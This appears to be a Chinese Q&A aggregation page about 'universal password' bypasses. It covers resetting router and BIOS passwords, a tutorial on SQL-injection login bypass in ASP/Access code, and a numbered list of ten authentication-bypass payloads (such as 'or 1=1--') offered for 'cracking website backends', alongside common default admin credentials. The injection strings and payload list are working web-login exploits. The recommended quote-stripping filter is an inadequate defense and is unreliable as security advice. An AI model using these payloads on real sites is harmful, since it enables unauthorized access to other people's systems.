万能密码绕过

Ⅰ TP LINK的登陆密码有没有办法绕过或者破解掉

http://jingyan..com/article/fb48e8be58a41c6e622e14c9.html

忘记了管理员密码怎么办？
管理密码（登录密码）是登录路由器的凭证，就像家门上的钥匙。如果您忘记自己路由器的管理密码，就像丢了兜里的钥匙，是无法进入家门的。忘记了登录的管理员密码，只能复位路由器，没有超级管理员密码之类的万能密码。复位路由器的方法如下：
在路由器壳体背面接口找到路由器的Reset复位键（部分路由器为Reset小孔），如下图：

路由器通电状态下，按住RESET键5秒以上，观察到指示灯全亮（部分路由器为系统指示灯同时快闪）后，表示复位成功。（RESET小孔要使用回形针等尖状物按住）。

出厂默认的管理员密码是多少？
复位之后重新登录，路由器要求您设置一个管理密码，对于较老版本的路由器，会要求输入默认的管理密码（admin）。请确认复位成功。
默认密码和用户大部分都是admin

Ⅱ 华硕笔记本BIOS密码和硬盘密码忘记怎么解。求解救～

忘记开机密码，还有希望通过PE来尝试清除密码，进入系统；但BIOS密码遗忘，只专能通过维修处理，属比如更换主板。建议将电脑整机送至华硕官方售后服务中心，由专业的维修工程师进行全面检测，并尝试维修。

华硕官方售后服务中心可以在官网如下版块查询：

Ⅲ 万能密码 'or'='or'如何防

一般用户在登陆时，系统会要求输入用户名及密码，然后将这些数据传输到指定页，进行验证，大致的代码如下：

Set Conn= Server.CreateObject("ADODB.Connection") '定义连接数据库的对象
Const AccessFile="jmdcw.mdb" '数据库地址
Conn.ConnectionString="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(AccessFile) '连接到数据库
Conn.Open '打开数据库
....................
name=request("name") '得到所提交的用户名
pass=request("pass") '得到所提交来的密码
............
Set Jmdcw=Server.CreateObject("ADODB.RecordSet") '定义操作数据库的对象
SQL="SELECT username,userpass FROM User WHERE username='"&name&"' AND userpass='"&pass&"'" 'SQL语句
Jmdcw.Open SQL,Conn,1,1 '执行查询
......
If Jmdcw.EOF AND Jmdcw.BOF Then '如果没有查询到
response.redirect "onerror.html" '显示错误页
end if
'如果正确，就继续执行。
..........

以上就是一段简单的用户验证代码，当注入漏洞被广泛发掘之后，类似这样的漏洞就越来越少了，但少并不表示程序员在写代码时已经具备了防范意识，无意之中还是会出现这样或那样的漏洞。OK，书归正传，先来测试一下上面的代码。输入的用户名是：jmdcw，密码是：123456。（典型的弱口令密码，哈哈），这样SQL语句就是：

select username,userpass from user where username='jmdcw' and userpass='123456'

程序会查询user表中是否有jmdcw用户，并且该用户的密码是否为123456。如果username='jmdcw'的结果为真，userpass='123456'的结果也为真，那么“真 And 真 ”的结果就是真，验证通过。

当然，如果用户名和密码其中之一的结果为假，“真 And 假 ”的结果就是假，当然“ 假 And 假 ”的结果也是假，呵呵。

没有用户名或密码怎么进入？试一下'or''='吧，在提交用户名处输入 jmdcw'or''='，这样的SQL语句就是

select username,userpass from user where username='jmdcw'or''='' and userpass='12345678'

在逻辑表达式中，AND的优先级要高于OR，所以语句会先对 “''='' and userpass='12345678'” 进行判断，虽然 ''='' 为真，但密码为假，所以结果为假，但因为我们加入了OR连接符，这样，虽然后面的结果为假，但username的结果为真，所以也一样能进入这个用户的后台。

但如果不知道用户的名称，那么就要在输入的密码后也加入一个'or''='，这样，SQL语句就是

select username,userpass from user where username='jmdcw11'or''='' and userpass='12345678'or''=''

在执行and语句，''='' and userpass='12345678'的结果为假，然后是 'jmdcw11'or假 ，结果为假，再接下来是：假or ''=''，这个结果就是真了。

但现在的密码都用MD5加密，对提交来的密码在进入SQL语句之前，先用MD5进行了转换，这样，就算在密码后加入了'or''='，也发挥不了作用。对于密码采用md5加密的，不妨在用户名处再加入一个or''=''，也 就是在用户名处输入：jmdcw'or''=''or''='，这样的SQL 语句就是：

select username,userpass from user where username='jmdcw11'or''=''or''='' and userpass='12345678'

先执行and语句，结果为假，然后是username='jmdcw11'or''=''，结果为真，接下来是：真or假，结果还是真，这样又绕过了验证。

说到这儿，我忽然想起，在文章开头所提到的网站，其密码也是用md5加密的，并且我也不知道任何一个用户名，也只用了一个or语句，为什么却进入了呢？思来思去，莫不是SQL语句中的用户与密码的位置有所不同，其的SQL语句是这样的：

select username,userpass from user where WHERE userpass='"&pass&"'" and username='"&name&"'，

密码在前面，用户在后面，这样，当我在用户名处输入：jm'or''='后，其语句就变成了

select username,userpass from user where WHERE userpass='123456" and username='jm'or''=''

按照优先级，先运算ANd语句，结果为假，然后是OR语句，假or''=''，结果就是真了。看来代码中的位置发生变化也能演绎成一种漏洞。

上面所提到的方法主要是针对于ACCESS数据库，但如果程序所对应的数据库是SQL，那危害就大很了，先不要说别的，还是说一下登陆的事情，直接用：

存在的用户名';--

这个可以不用密码就登陆到指定的用户之中,如果不知道呢:就用:

任意名称'or''='';--

这样所进入的会是第一个用户,很有可能是管理员的用户之中.

如何防止这种漏洞呢？很简单，就是在接收字符的语句中加入replace过滤语句，比如name就是：

name=replace(request("name"),"'","")

将'过滤为空。密码过滤的方法也类似。当然，这是简单的过滤方法，还有更多复杂的。比如过滤一些特殊字符，空格、chr(0)、%、script等一些字符，防止写入XSS代码。

Ⅳ 寻求破解网站后台最新万能密码

网站后台万能密码就是在用户名与密码处都写入下列字符,如果知道管理员帐号的话直接添帐号,效果会更好!

例如我们要利用第一条就是:

用户名:"or "a"="a

密码:"or "a"="a

*********************************************************

1："or "a"="a
2： '.).or.('.a.'='.a
3：or 1=1--
4：'or 1=1--
5：a'or' 1=1--
6："or 1=1--
7：'or.'a.'='a
8："or"="a'='a
9：'or''='
10：'or'='or'

原理都是利用SQL语法来利用注入,其实这也是注入的一种,都是因为提交字符未加过滤或过滤不严而导致的.

其实万能是没有的,默认是很多的,
admin
admin

admin
admin888

少数ASP网页后面登陆时可以用密码1'or'1'='1(用户名用admin等试)登陆成功。这一般也是SQL注入的第一课，原理涉及到SQL语句……验证登陆时，如果密码=输入的密码，那么登陆成功，把1' or '1'='1带入即“如果密码=1或者1=1那么登成功”由于1=1恒成立，且“密码=1”与“1=1”是逻辑或的关系，则整句为TRUE，即登陆成功。这样说懂不？

其实后台万能登陆密码这个称号真的不那么专业，或许叫做“后台验证绕过语句”还好些，不过前者叫得普遍些。

Ⅳ 我发现我家的wifi存在严重的安全漏洞—别人只要用一个叫wifi万能钥匙的软件就可以绕过密码连接，

其实很简单，
万能钥匙在先进目前也只能有限破解简单数字组合密码，
当然我也是蹭网大户，Wifi万能钥匙是对智手机，电脑就O了
你只要从电脑端进入路由器(底盘下面的168、192等地址)设置无线安全密码改成你爱记住的字母，大小写要记住在加几个数就好
万能钥匙破解不了字母
其它也没什么了
望能帮助你